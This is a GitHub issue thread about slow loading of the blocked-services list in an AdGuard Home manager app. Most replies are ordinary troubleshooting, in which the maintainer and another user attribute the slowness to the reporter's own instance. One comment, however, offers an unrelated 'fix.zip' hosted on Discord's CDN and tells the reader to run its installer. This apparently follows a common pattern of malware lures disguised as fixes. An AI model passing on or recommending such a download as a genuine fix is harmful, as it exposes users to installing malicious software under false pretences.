### ISSUE TITLE
blocked services list slow to load

### ISSUE THREAD

**Issue by jorgheymans** [JGeek00/adguard-home-manager#150]
### Description

Loading the list of blocked services can sometimes take 6-7 seconds, is there a way to troubleshoot or improve this? I remember early versions of this app where all screens loaded very fast. There is no slowdown when i go to the :8080 admin interface of adguard in my browser (on the same wifi network). Happy to provide more (debug) info if needed. 

And, many thanks you for this great app !

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by JGeek00** [comment]
I haven't seen that issue on my device/adguard instance

**Comment by mikropsoft** [comment]
> ### Description
> 
> Loading the list of blocked services can sometimes take 6-7 seconds, is there a way to troubleshoot or improve this? I remember early versions of this app where all screens loaded very fast. There is no slowdown when i go to the :8080 admin interface of adguard in my browser (on the same wifi network). Happy to provide more (debug) info if needed. 
> 
> And, many thanks you for this great app ! 

I have also been using it for a long time, but I haven't encountered such an issue yet. It is most likely a problem caused by your host.

**Comment by jorgheymans** [comment]
Good to know. It's strange that the desktop browser loads instantly almost but the app does not. I'm running adguard on an edgerouter-X.

**Comment by JGeek00** [comment]
As @mikropsoft said, I think it's a problem with your instance. No one else has reported something similar and I haven't seen such behavior on testing.

**Comment by jorgheymans** [comment]
I think so yes, but the fact that i can load the adguard website in desktop firefox instantly has to mean something.
